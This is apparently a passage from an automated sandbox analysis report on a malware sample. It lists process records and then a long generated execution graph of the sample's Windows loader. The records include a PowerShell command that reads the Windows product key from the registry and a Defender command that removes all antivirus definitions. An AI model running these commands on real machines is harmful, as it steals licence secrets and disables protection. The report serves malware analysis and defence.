                                                      Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:88
                                                      Start time:20:22:25
                                                      Start date:03/08/2024
                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                      Imagebase:0x7ff687d40000
                                                      File size:468'120 bytes
                                                      MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:11.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:18.2%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:32
                                                        execution_graph 19257 7ff73ae3ab89 19258 7ff73ae3ab98 19257->19258 19260 7ff73ae3aba2 19257->19260 19261 7ff73ae30d18 LeaveCriticalSection 19258->19261 18946 7ff73ae25310 18947 7ff73ae2531b 18946->18947 18955 7ff73ae2f764 18947->18955 18968 7ff73ae30cb8 EnterCriticalSection 18955->18968 19276 7ff73ae1bf90 19277 7ff73ae1bfa0 19276->19277 19293 7ff73ae2a138 19277->19293 19279 7ff73ae1bfac 19299 7ff73ae1c298 19279->19299 19281 7ff73ae1c57c 7 API calls 19282 7ff73ae1c045 19281->19282 19283 7ff73ae1bfc4 _RTC_Initialize 19291 7ff73ae1c019 19283->19291 19304 7ff73ae1c448 19283->19304 19285 7ff73ae1bfd9 19307 7ff73ae295a4 19285->19307 19291->19281 19292 7ff73ae1c035 19291->19292 19294 7ff73ae2a149 19293->19294 19295 7ff73ae254c4 memcpy_s 11 API calls 19294->19295 19296 7ff73ae2a151 19294->19296 19297 7ff73ae2a160 19295->19297 19296->19279 19298 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 19297->19298 19298->19296 19300 7ff73ae1c2a9 19299->19300 19303 7ff73ae1c2ae __scrt_release_startup_lock 19299->19303 19301 7ff73ae1c57c 7 API calls 19300->19301 19300->19303 19302 7ff73ae1c322 19301->19302 19303->19283 19332 7ff73ae1c40c 19304->19332 19306 7ff73ae1c451 19306->19285 19308 7ff73ae295c4 19307->19308 19330 7ff73ae1bfe5 19307->19330 19309 7ff73ae295cc 19308->19309 19310 7ff73ae295e2 GetModuleFileNameW 19308->19310 19311 7ff73ae254c4 memcpy_s 11 API calls 19309->19311 19314 7ff73ae2960d 19310->19314 19312 7ff73ae295d1 19311->19312 19313 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 19312->19313 19313->19330 19315 7ff73ae29544 11 API calls 19314->19315 19316 7ff73ae2964d 19315->19316 19317 7ff73ae2966d 19316->19317 19318 7ff73ae29655 19316->19318 19321 7ff73ae2968f 19317->19321 19324 7ff73ae296bb 19317->19324 19325 7ff73ae296d4 19317->19325 19319 7ff73ae254c4 memcpy_s 11 API calls 19318->19319 19320 7ff73ae2965a 19319->19320 19322 7ff73ae2af0c __free_lconv_num 11 API calls 19320->19322 19323 7ff73ae2af0c __free_lconv_num 11 API calls 19321->19323 19322->19330 19323->19330 19326 7ff73ae2af0c __free_lconv_num 11 API calls 19324->19326 19327 7ff73ae2af0c __free_lconv_num 11 API calls 19325->19327 19328 7ff73ae296c4 19326->19328 19327->19321 19329 7ff73ae2af0c __free_lconv_num 11 API calls 19328->19329 19329->19330 19330->19291 19331 7ff73ae1c51c InitializeSListHead 19330->19331 19333 7ff73ae1c426 19332->19333 19335 7ff73ae1c41f 19332->19335 19336 7ff73ae2a77c 19333->19336 19335->19306 19339 7ff73ae2a3b8 19336->19339 19346 7ff73ae30cb8 EnterCriticalSection 19339->19346 19347 7ff73ae2b590 19348 7ff73ae2b5aa 19347->19348 19349 7ff73ae2b595 19347->19349 19353 7ff73ae2b5b0 19349->19353 19354 7ff73ae2b5fa 19353->19354 19355 7ff73ae2b5f2 19353->19355 19357 7ff73ae2af0c __free_lconv_num 11 API calls 19354->19357 19356 7ff73ae2af0c __free_lconv_num 11 API calls 19355->19356 19356->19354 19358 7ff73ae2b607 19357->19358 19359 7ff73ae2af0c __free_lconv_num 11 API calls 19358->19359 19360 7ff73ae2b614 19359->19360 19361 7ff73ae2af0c __free_lconv_num 11 API calls 19360->19361 19362 7ff73ae2b621 19361->19362 19363 7ff73ae2af0c __free_lconv_num 11 API calls 19362->19363 19364 7ff73ae2b62e 19363->19364 19365 7ff73ae2af0c __free_lconv_num 11 API calls 19364->19365 19366 7ff73ae2b63b 19365->19366 19367 7ff73ae2af0c __free_lconv_num 11 API calls 19366->19367 19368 7ff73ae2b648 19367->19368 19369 7ff73ae2af0c __free_lconv_num 11 API calls 19368->19369 19370 7ff73ae2b655 19369->19370 19371 7ff73ae2af0c __free_lconv_num 11 API calls 19370->19371 19372 7ff73ae2b665 19371->19372 19373 7ff73ae2af0c __free_lconv_num 11 API calls 19372->19373 19374 7ff73ae2b675 19373->19374 19379 7ff73ae2b458 19374->19379 19393 7ff73ae30cb8 EnterCriticalSection 19379->19393 15994 7ff73ae1c07c 16015 7ff73ae1c24c 15994->16015 15997 7ff73ae1c1c8 16111 7ff73ae1c57c IsProcessorFeaturePresent 15997->16111 15998 7ff73ae1c098 __scrt_acquire_startup_lock 16000 7ff73ae1c1d2 15998->16000 16007 7ff73ae1c0b6 __scrt_release_startup_lock 15998->16007 16001 7ff73ae1c57c 7 API calls 16000->16001 16003 7ff73ae1c1dd __GetCurrentState 16001->16003 16002 7ff73ae1c0db 16004 7ff73ae1c161 16021 7ff73ae1c6c8 16004->16021 16006 7ff73ae1c166 16024 7ff73ae11000 16006->16024 16007->16002 16007->16004 16100 7ff73ae2a0bc 16007->16100 16012 7ff73ae1c189 16012->16003 16107 7ff73ae1c3e0 16012->16107 16118 7ff73ae1c84c 16015->16118 16018 7ff73ae1c090 16018->15997 16018->15998 16019 7ff73ae1c27b __scrt_initialize_crt 16019->16018 16120 7ff73ae1d998 16019->16120 16147 7ff73ae1d0e0 16021->16147 16025 7ff73ae1100b 16024->16025 16149 7ff73ae186b0 16025->16149 16027 7ff73ae1101d 16156 7ff73ae25ef8 16027->16156 16029 7ff73ae139cb 16163 7ff73ae11eb0 16029->16163 16033 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16034 7ff73ae13ae6 16033->16034 16105 7ff73ae1c70c GetModuleHandleW 16034->16105 16035 7ff73ae139ea 16097 7ff73ae13ad2 16035->16097 16179 7ff73ae17b60 16035->16179 16037 7ff73ae13a1f 16038 7ff73ae13a6b 16037->16038 16040 7ff73ae17b60 61 API calls 16037->16040 16194 7ff73ae18040 16038->16194 16045 7ff73ae13a40 __vcrt_freefls 16040->16045 16041 7ff73ae13a80 16198 7ff73ae11cb0 16041->16198 16044 7ff73ae13b71 16047 7ff73ae13b95 16044->16047 16217 7ff73ae114f0 16044->16217 16045->16038 16049 7ff73ae18040 58 API calls 16045->16049 16046 7ff73ae11cb0 121 API calls 16048 7ff73ae13ab6 16046->16048 16050 7ff73ae13bef 16047->16050 16047->16097 16224 7ff73ae18ae0 16047->16224 16052 7ff73ae13af8 16048->16052 16053 7ff73ae13aba 16048->16053 16049->16038 16238 7ff73ae16de0 16050->16238 16052->16044 16312 7ff73ae13fd0 16052->16312 16299 7ff73ae12b30 16053->16299 16055 7ff73ae13bcc 16059 7ff73ae13bd1 16055->16059 16060 7ff73ae13be2 SetDllDirectoryW 16055->16060 16063 7ff73ae12b30 59 API calls 16059->16063 16060->16050 16063->16097 16064 7ff73ae13b16 16069 7ff73ae12b30 59 API calls 16064->16069 16066 7ff73ae13c09 16092 7ff73ae13c3b 16066->16092 16344 7ff73ae165f0 16066->16344 16068 7ff73ae13b44 16068->16044 16073 7ff73ae13b49 16068->16073 16069->16097 16070 7ff73ae13d06 16242 7ff73ae134c0 16070->16242 16331 7ff73ae2018c 16073->16331 16077 7ff73ae13c5a 16083 7ff73ae13ca5 16077->16083 16380 7ff73ae11ef0 16077->16380 16078 7ff73ae13c3d 16082 7ff73ae16840 FreeLibrary 16078->16082 16082->16092 16083->16097 16384 7ff73ae13460 16083->16384 16085 7ff73ae13d2e 16087 7ff73ae17b60 61 API calls 16085->16087 16086 7ff73ae13c2c 16090 7ff73ae13d3a 16087->16090 16256 7ff73ae18080 16090->16256 16091 7ff73ae13ce1 16094 7ff73ae16840 FreeLibrary 16091->16094 16092->16070 16092->16077 16094->16097 16097->16033 16101 7ff73ae2a0d3 16100->16101 16102 7ff73ae2a0f4 16100->16102 16101->16004 18768 7ff73ae2a968 16102->18768 16106 7ff73ae1c71d 16105->16106 16106->16012 16109 7ff73ae1c3f1 16107->16109 16108 7ff73ae1c1a0 16108->16002 16109->16108 16110 7ff73ae1d998 __scrt_initialize_crt 7 API calls 16109->16110 16110->16108 16112 7ff73ae1c5a2 _wfindfirst32i64 memcpy_s 16111->16112 16113 7ff73ae1c5c1 RtlCaptureContext RtlLookupFunctionEntry 16112->16113 16114 7ff73ae1c5ea RtlVirtualUnwind 16113->16114 16115 7ff73ae1c626 memcpy_s 16113->16115 16114->16115 16116 7ff73ae1c658 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16115->16116 16117 7ff73ae1c6aa _wfindfirst32i64 16116->16117 16117->16000 16119 7ff73ae1c26e __scrt_dllmain_crt_thread_attach 16118->16119 16119->16018 16119->16019 16121 7ff73ae1d9aa 16120->16121 16122 7ff73ae1d9a0 16120->16122 16121->16018 16126 7ff73ae1dd14 16122->16126 16127 7ff73ae1d9a5 16126->16127 16128 7ff73ae1dd23 16126->16128 16130 7ff73ae1dd80 16127->16130 16134 7ff73ae1df50 16128->16134 16131 7ff73ae1ddab 16130->16131 16132 7ff73ae1dd8e DeleteCriticalSection 16131->16132 16133 7ff73ae1ddaf 16131->16133 16132->16131 16133->16121 16138 7ff73ae1ddb8 16134->16138 16139 7ff73ae1ddfc __vcrt_InitializeCriticalSectionEx 16138->16139 16145 7ff73ae1ded2 TlsFree 16138->16145 16140 7ff73ae1de2a LoadLibraryExW 16139->16140 16141 7ff73ae1dec1 GetProcAddress 16139->16141 16139->16145 16146 7ff73ae1de6d LoadLibraryExW 16139->16146 16142 7ff73ae1de4b GetLastError 16140->16142 16143 7ff73ae1dea1 16140->16143 16141->16145 16142->16139 16143->16141 16144 7ff73ae1deb8 FreeLibrary 16143->16144 16144->16141 16146->16139 16146->16143 16148 7ff73ae1c6df GetStartupInfoW 16147->16148 16148->16006 16151 7ff73ae186cf 16149->16151 16150 7ff73ae18720 WideCharToMultiByte 16150->16151 16152 7ff73ae187c6 16150->16152 16151->16150 16151->16152 16153 7ff73ae18774 WideCharToMultiByte 16151->16153 16155 7ff73ae186d7 __vcrt_freefls 16151->16155 16418 7ff73ae129e0 16152->16418 16153->16151 16153->16152 16155->16027 16157 7ff73ae30050 16156->16157 16159 7ff73ae300f6 16157->16159 16160 7ff73ae300a3 16157->16160 16158 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16162 7ff73ae300cc 16158->16162 16749 7ff73ae2ff28 16159->16749 16160->16158 16162->16029 16164 7ff73ae11ec5 16163->16164 16165 7ff73ae11ee0 16164->16165 16757 7ff73ae12890 16164->16757 16165->16097 16167 7ff73ae13ec0 16165->16167 16168 7ff73ae1bc60 16167->16168 16169 7ff73ae13ecc GetModuleFileNameW 16168->16169 16170 7ff73ae13efb 16169->16170 16171 7ff73ae13f12 16169->16171 16172 7ff73ae129e0 57 API calls 16170->16172 16797 7ff73ae18bf0 16171->16797 16174 7ff73ae13f0e 16172->16174 16176 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16174->16176 16178 7ff73ae13f4f 16176->16178 16177 7ff73ae12b30 59 API calls 16177->16174 16178->16035 16180 7ff73ae17b6a 16179->16180 16181 7ff73ae18ae0 57 API calls 16180->16181 16182 7ff73ae17b8c GetEnvironmentVariableW 16181->16182 16183 7ff73ae17ba4 ExpandEnvironmentStringsW 16182->16183 16184 7ff73ae17bf6 16182->16184 16185 7ff73ae18bf0 59 API calls 16183->16185 16186 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16184->16186 16187 7ff73ae17bcc 16185->16187 16188 7ff73ae17c08 16186->16188 16187->16184 16189 7ff73ae17bd6 16187->16189 16188->16037 16808 7ff73ae2a99c 16189->16808 16192 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16193 7ff73ae17bee 16192->16193 16193->16037 16195 7ff73ae18ae0 57 API calls 16194->16195 16196 7ff73ae18057 SetEnvironmentVariableW 16195->16196 16197 7ff73ae1806f __vcrt_freefls 16196->16197 16197->16041 16199 7ff73ae11cbe 16198->16199 16200 7ff73ae11ef0 49 API calls 16199->16200 16201 7ff73ae11cf4 16200->16201 16202 7ff73ae11dde 16201->16202 16203 7ff73ae11ef0 49 API calls 16201->16203 16205 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16202->16205 16204 7ff73ae11d1a 16203->16204 16204->16202 16815 7ff73ae11aa0 16204->16815 16206 7ff73ae11e6c 16205->16206 16206->16044 16206->16046 16210 7ff73ae11dcc 16211 7ff73ae13e40 49 API calls 16210->16211 16211->16202 16212 7ff73ae11d8f 16212->16210 16213 7ff73ae11e34 16212->16213 16214 7ff73ae13e40 49 API calls 16213->16214 16215 7ff73ae11e41 16214->16215 16851 7ff73ae14050 16215->16851 16220 7ff73ae1157f 16217->16220 16222 7ff73ae11506 16217->16222 16220->16047 16221 7ff73ae12b30 59 API calls 16223 7ff73ae11564 16221->16223 16893 7ff73ae17950 16222->16893 16223->16047 16225 7ff73ae18b87 MultiByteToWideChar 16224->16225 16226 7ff73ae18b01 MultiByteToWideChar 16224->16226 16229 7ff73ae18baa 16225->16229 16230 7ff73ae18bcf 16225->16230 16227 7ff73ae18b27 16226->16227 16228 7ff73ae18b4c 16226->16228 16231 7ff73ae129e0 55 API calls 16227->16231 16228->16225 16235 7ff73ae18b62 16228->16235 16232 7ff73ae129e0 55 API calls 16229->16232 16230->16055 16234 7ff73ae18b3a 16231->16234 16233 7ff73ae18bbd 16232->16233 16233->16055 16234->16055 16236 7ff73ae129e0 55 API calls 16235->16236 16237 7ff73ae18b75 16236->16237 16237->16055 16239 7ff73ae16df5 16238->16239 16240 7ff73ae13bf4 16239->16240 16241 7ff73ae12890 59 API calls 16239->16241 16240->16092 16335 7ff73ae16a90 16240->16335 16241->16240 16243 7ff73ae13574 16242->16243 16247 7ff73ae13533 16242->16247 16244 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16243->16244 16245 7ff73ae135c5 16244->16245 16245->16097 16249 7ff73ae17fd0 16245->16249 16247->16243 17427 7ff73ae11710 16247->17427 17469 7ff73ae12d70 16247->17469 16250 7ff73ae18ae0 57 API calls 16249->16250 16251 7ff73ae17fef 16250->16251 16252 7ff73ae18ae0 57 API calls 16251->16252 16253 7ff73ae17fff 16252->16253 16254 7ff73ae27dec 38 API calls 16253->16254 16255 7ff73ae1800d __vcrt_freefls 16254->16255 16255->16085 16257 7ff73ae18090 16256->16257 16258 7ff73ae18ae0 57 API calls 16257->16258 16259 7ff73ae180c1 SetConsoleCtrlHandler GetStartupInfoW 16258->16259 16260 7ff73ae18122 16259->16260 17908 7ff73ae2aa14 16260->17908 16300 7ff73ae12b50 16299->16300 16301 7ff73ae24ac4 49 API calls 16300->16301 16302 7ff73ae12b9b memcpy_s 16301->16302 16303 7ff73ae18ae0 57 API calls 16302->16303 16304 7ff73ae12bd0 16303->16304 16305 7ff73ae12c0d MessageBoxA 16304->16305 16306 7ff73ae12bd5 16304->16306 16308 7ff73ae12c27 16305->16308 16307 7ff73ae18ae0 57 API calls 16306->16307 16309 7ff73ae12bef MessageBoxW 16307->16309 16310 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16308->16310 16309->16308 16311 7ff73ae12c37 16310->16311 16311->16097 16313 7ff73ae13fdc 16312->16313 16314 7ff73ae18ae0 57 API calls 16313->16314 16315 7ff73ae14007 16314->16315 16316 7ff73ae18ae0 57 API calls 16315->16316 16317 7ff73ae1401a 16316->16317 17964 7ff73ae264a8 16317->17964 16320 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16321 7ff73ae13b0e 16320->16321 16321->16064 16322 7ff73ae182b0 16321->16322 16323 7ff73ae182d4 16322->16323 16324 7ff73ae20814 73 API calls 16323->16324 16329 7ff73ae183ab __vcrt_freefls 16323->16329 16325 7ff73ae182ee 16324->16325 16325->16329 18343 7ff73ae29070 16325->18343 16329->16068 16332 7ff73ae201bc 16331->16332 18358 7ff73ae1ff68 16332->18358 16334 7ff73ae201d5 16334->16064 16336 7ff73ae16ab3 16335->16336 16338 7ff73ae16aca 16335->16338 16336->16338 18369 7ff73ae115a0 16336->18369 16338->16066 16339 7ff73ae16ad4 16339->16338 16340 7ff73ae14050 49 API calls 16339->16340 16341 7ff73ae16b35 16340->16341 16342 7ff73ae12b30 59 API calls 16341->16342 16343 7ff73ae16ba5 memcpy_s __vcrt_freefls 16341->16343 16342->16338 16343->16066 16353 7ff73ae1660a memcpy_s 16344->16353 16346 7ff73ae1672f 16348 7ff73ae14050 49 API calls 16346->16348 16347 7ff73ae1674b 16349 7ff73ae12b30 59 API calls 16347->16349 16350 7ff73ae167a8 16348->16350 16355 7ff73ae16741 __vcrt_freefls 16349->16355 16354 7ff73ae14050 49 API calls 16350->16354 16351 7ff73ae14050 49 API calls 16351->16353 16352 7ff73ae16710 16352->16346 16356 7ff73ae14050 49 API calls 16352->16356 16353->16346 16353->16347 16353->16351 16353->16352 16360 7ff73ae11710 144 API calls 16353->16360 16362 7ff73ae16731 16353->16362 18393 7ff73ae11950 16353->18393 16359 7ff73ae167d8 16354->16359 16357 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16355->16357 16356->16346 16358 7ff73ae13c1a 16357->16358 16358->16078 16364 7ff73ae16570 16358->16364 16361 7ff73ae14050 49 API calls 16359->16361 16360->16353 16361->16355 16363 7ff73ae12b30 59 API calls 16362->16363 16363->16355 18397 7ff73ae18260 16364->18397 16366 7ff73ae1658c 16367 7ff73ae18260 58 API calls 16366->16367 16368 7ff73ae1659f 16367->16368 16369 7ff73ae165d5 16368->16369 16370 7ff73ae165b7 16368->16370 16371 7ff73ae12b30 59 API calls 16369->16371 18401 7ff73ae16ef0 GetProcAddress 16370->18401 16373 7ff73ae13c28 16371->16373 16373->16078 16373->16086 16381 7ff73ae11f15 16380->16381 16382 7ff73ae24ac4 49 API calls 16381->16382 16383 7ff73ae11f38 16382->16383 16383->16083 18460 7ff73ae15bc0 16384->18460 16387 7ff73ae134ad 16387->16091 16389 7ff73ae13484 16389->16387 16437 7ff73ae1bc60 16418->16437 16421 7ff73ae12a29 16439 7ff73ae24ac4 16421->16439 16426 7ff73ae11ef0 49 API calls 16427 7ff73ae12a86 memcpy_s 16426->16427 16428 7ff73ae18ae0 54 API calls 16427->16428 16429 7ff73ae12abb 16428->16429 16430 7ff73ae12af8 MessageBoxA 16429->16430 16431 7ff73ae12ac0 16429->16431 16433 7ff73ae12b12 16430->16433 16432 7ff73ae18ae0 54 API calls 16431->16432 16434 7ff73ae12ada MessageBoxW 16432->16434 16435 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16433->16435 16434->16433 16436 7ff73ae12b22 16435->16436 16436->16155 16438 7ff73ae129fc GetLastError 16437->16438 16438->16421 16441 7ff73ae24b1e 16439->16441 16440 7ff73ae24b43 16442 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16440->16442 16441->16440 16443 7ff73ae24b7f 16441->16443 16445 7ff73ae24b6d 16442->16445 16469 7ff73ae22d50 16443->16469 16447 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16445->16447 16446 7ff73ae24c28 16454 7ff73ae24c5c 16446->16454 16456 7ff73ae24c31 16446->16456 16449 7ff73ae12a57 16447->16449 16448 7ff73ae2af0c __free_lconv_num 11 API calls 16448->16445 16457 7ff73ae18560 16449->16457 16451 7ff73ae24c80 16452 7ff73ae24c8a 16451->16452 16451->16454 16455 7ff73ae2af0c __free_lconv_num 11 API calls 16452->16455 16453 7ff73ae2af0c __free_lconv_num 11 API calls 16453->16445 16454->16448 16455->16445 16456->16453 16458 7ff73ae1856c 16457->16458 16459 7ff73ae18587 GetLastError 16458->16459 16460 7ff73ae1858d FormatMessageW 16458->16460 16459->16460 16461 7ff73ae185dc WideCharToMultiByte 16460->16461 16462 7ff73ae185c0 16460->16462 16463 7ff73ae185d3 16461->16463 16464 7ff73ae18616 16461->16464 16465 7ff73ae129e0 54 API calls 16462->16465 16467 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16463->16467 16466 7ff73ae129e0 54 API calls 16464->16466 16465->16463 16466->16463 16468 7ff73ae12a5e 16467->16468 16468->16426 16470 7ff73ae22d8e 16469->16470 16475 7ff73ae22d7e 16469->16475 16471 7ff73ae22d97 16470->16471 16477 7ff73ae22dc5 16470->16477 16473 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16471->16473 16472 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16474 7ff73ae22dbd 16472->16474 16473->16474 16474->16446 16474->16451 16474->16454 16474->16456 16475->16472 16477->16474 16477->16475 16479 7ff73ae23074 16477->16479 16483 7ff73ae236e0 16477->16483 16509 7ff73ae233a8 16477->16509 16539 7ff73ae22c30 16477->16539 16542 7ff73ae24900 16477->16542 16481 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16479->16481 16481->16475 16484 7ff73ae23722 16483->16484 16485 7ff73ae23795 16483->16485 16486 7ff73ae23728 16484->16486 16487 7ff73ae237bf 16484->16487 16488 7ff73ae2379a 16485->16488 16489 7ff73ae237ef 16485->16489 16496 7ff73ae2372d 16486->16496 16501 7ff73ae237fe 16486->16501 16566 7ff73ae21c90 16487->16566 16490 7ff73ae2379c 16488->16490 16491 7ff73ae237cf 16488->16491 16489->16487 16499 7ff73ae23758 16489->16499 16489->16501 16493 7ff73ae2373d 16490->16493 16500 7ff73ae237ab 16490->16500 16573 7ff73ae21880 16491->16573 16508 7ff73ae2382d 16493->16508 16548 7ff73ae24044 16493->16548 16496->16493 16497 7ff73ae23770 16496->16497 16496->16499 16497->16508 16558 7ff73ae24500 16497->16558 16499->16508 16587 7ff73ae2ee18 16499->16587 16500->16487 16503 7ff73ae237b0 16500->16503 16501->16508 16580 7ff73ae220a0 16501->16580 16503->16508 16562 7ff73ae24698 16503->16562 16504 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16505 7ff73ae23ac3 16504->16505 16505->16477 16508->16504 16510 7ff73ae233b3 16509->16510 16511 7ff73ae233c9 16509->16511 16512 7ff73ae23407 16510->16512 16513 7ff73ae23722 16510->16513 16514 7ff73ae23795 16510->16514 16511->16512 16515 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16511->16515 16512->16477 16516 7ff73ae23728 16513->16516 16517 7ff73ae237bf 16513->16517 16518 7ff73ae2379a 16514->16518 16519 7ff73ae237ef 16514->16519 16515->16512 16526 7ff73ae2372d 16516->16526 16530 7ff73ae237fe 16516->16530 16522 7ff73ae21c90 38 API calls 16517->16522 16520 7ff73ae2379c 16518->16520 16521 7ff73ae237cf 16518->16521 16519->16517 16519->16530 16537 7ff73ae23758 16519->16537 16523 7ff73ae2373d 16520->16523 16529 7ff73ae237ab 16520->16529 16524 7ff73ae21880 38 API calls 16521->16524 16522->16537 16525 7ff73ae24044 47 API calls 16523->16525 16538 7ff73ae2382d 16523->16538 16524->16537 16525->16537 16526->16523 16527 7ff73ae23770 16526->16527 16526->16537 16531 7ff73ae24500 47 API calls 16527->16531 16527->16538 16528 7ff73ae220a0 38 API calls 16528->16537 16529->16517 16532 7ff73ae237b0 16529->16532 16530->16528 16530->16538 16531->16537 16534 7ff73ae24698 37 API calls 16532->16534 16532->16538 16533 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 16535 7ff73ae23ac3 16533->16535 16534->16537 16535->16477 16536 7ff73ae2ee18 47 API calls 16536->16537 16537->16536 16537->16538 16538->16533 16724 7ff73ae20e54 16539->16724 16543 7ff73ae24917 16542->16543 16741 7ff73ae2df78 16543->16741 16549 7ff73ae24066 16548->16549 16597 7ff73ae20cc0 16549->16597 16554 7ff73ae24900 45 API calls 16555 7ff73ae241a3 16554->16555 16556 7ff73ae24900 45 API calls 16555->16556 16557 7ff73ae2422c 16555->16557 16556->16557 16557->16499 16559 7ff73ae24518 16558->16559 16561 7ff73ae24580 16558->16561 16560 7ff73ae2ee18 47 API calls 16559->16560 16559->16561 16560->16561 16561->16499 16564 7ff73ae246b9 16562->16564 16563 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16565 7ff73ae246ea 16563->16565 16564->16563 16564->16565 16565->16499 16567 7ff73ae21cc3 16566->16567 16568 7ff73ae21cf2 16567->16568 16571 7ff73ae21daf 16567->16571 16569 7ff73ae21d2f 16568->16569 16570 7ff73ae20cc0 12 API calls 16568->16570 16569->16499 16570->16569 16572 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16571->16572 16572->16569 16574 7ff73ae218b3 16573->16574 16575 7ff73ae218e2 16574->16575 16577 7ff73ae2199f 16574->16577 16576 7ff73ae20cc0 12 API calls 16575->16576 16579 7ff73ae2191f 16575->16579 16576->16579 16578 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16577->16578 16578->16579 16579->16499 16581 7ff73ae220d3 16580->16581 16582 7ff73ae22102 16581->16582 16584 7ff73ae221bf 16581->16584 16583 7ff73ae20cc0 12 API calls 16582->16583 16586 7ff73ae2213f 16582->16586 16583->16586 16585 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16584->16585 16585->16586 16586->16499 16588 7ff73ae2ee40 16587->16588 16589 7ff73ae2ee85 16588->16589 16590 7ff73ae24900 45 API calls 16588->16590 16593 7ff73ae2ee45 memcpy_s 16588->16593 16596 7ff73ae2ee6e memcpy_s 16588->16596 16592 7ff73ae304c8 WideCharToMultiByte 16589->16592 16589->16593 16589->16596 16590->16589 16591 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16591->16593 16594 7ff73ae2ef61 16592->16594 16593->16499 16594->16593 16595 7ff73ae2ef76 GetLastError 16594->16595 16595->16593 16595->16596 16596->16591 16596->16593 16598 7ff73ae20ce6 16597->16598 16599 7ff73ae20cf7 16597->16599 16605 7ff73ae2eb30 16598->16605 16599->16598 16600 7ff73ae2dbbc _fread_nolock 12 API calls 16599->16600 16601 7ff73ae20d24 16600->16601 16602 7ff73ae20d38 16601->16602 16603 7ff73ae2af0c __free_lconv_num 11 API calls 16601->16603 16604 7ff73ae2af0c __free_lconv_num 11 API calls 16602->16604 16603->16602 16604->16598 16606 7ff73ae2eb4d 16605->16606 16607 7ff73ae2eb80 16605->16607 16608 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16606->16608 16607->16606 16609 7ff73ae2ebb2 16607->16609 16617 7ff73ae24181 16608->16617 16614 7ff73ae2ecc5 16609->16614 16622 7ff73ae2ebfa 16609->16622 16610 7ff73ae2edb7 16651 7ff73ae2e01c 16610->16651 16612 7ff73ae2ed7d 16644 7ff73ae2e3b4 16612->16644 16614->16610 16614->16612 16615 7ff73ae2ed4c 16614->16615 16616 7ff73ae2ed0f 16614->16616 16619 7ff73ae2ed05 16614->16619 16637 7ff73ae2e694 16615->16637 16627 7ff73ae2e8c4 16616->16627 16617->16554 16617->16555 16619->16612 16621 7ff73ae2ed0a 16619->16621 16621->16615 16621->16616 16622->16617 16623 7ff73ae2aa3c __std_exception_copy 37 API calls 16622->16623 16624 7ff73ae2ecb2 16623->16624 16624->16617 16625 7ff73ae2aec4 _wfindfirst32i64 17 API calls 16624->16625 16626 7ff73ae2ee14 16625->16626 16660 7ff73ae3471c 16627->16660 16631 7ff73ae2e96c 16632 7ff73ae2e9c1 16631->16632 16634 7ff73ae2e98c 16631->16634 16636 7ff73ae2e970 16631->16636 16713 7ff73ae2e4b0 16632->16713 16709 7ff73ae2e76c 16634->16709 16636->16617 16638 7ff73ae3471c 38 API calls 16637->16638 16639 7ff73ae2e6de 16638->16639 16640 7ff73ae34164 37 API calls 16639->16640 16641 7ff73ae2e72e 16640->16641 16642 7ff73ae2e732 16641->16642 16643 7ff73ae2e76c 45 API calls 16641->16643 16642->16617 16643->16642 16645 7ff73ae3471c 38 API calls 16644->16645 16646 7ff73ae2e3ff 16645->16646 16647 7ff73ae34164 37 API calls 16646->16647 16648 7ff73ae2e457 16647->16648 16649 7ff73ae2e45b 16648->16649 16650 7ff73ae2e4b0 45 API calls 16648->16650 16649->16617 16650->16649 16652 7ff73ae2e061 16651->16652 16653 7ff73ae2e094 16651->16653 16654 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 16652->16654 16655 7ff73ae2e0ac 16653->16655 16657 7ff73ae2e12d 16653->16657 16659 7ff73ae2e08d memcpy_s 16654->16659 16656 7ff73ae2e3b4 46 API calls 16655->16656 16656->16659 16658 7ff73ae24900 45 API calls 16657->16658 16657->16659 16658->16659 16659->16617 16661 7ff73ae3476f fegetenv 16660->16661 16662 7ff73ae3867c 37 API calls 16661->16662 16668 7ff73ae347c2 16662->16668 16663 7ff73ae347ef 16667 7ff73ae2aa3c __std_exception_copy 37 API calls 16663->16667 16664 7ff73ae348b2 16665 7ff73ae3867c 37 API calls 16664->16665 16666 7ff73ae348dc 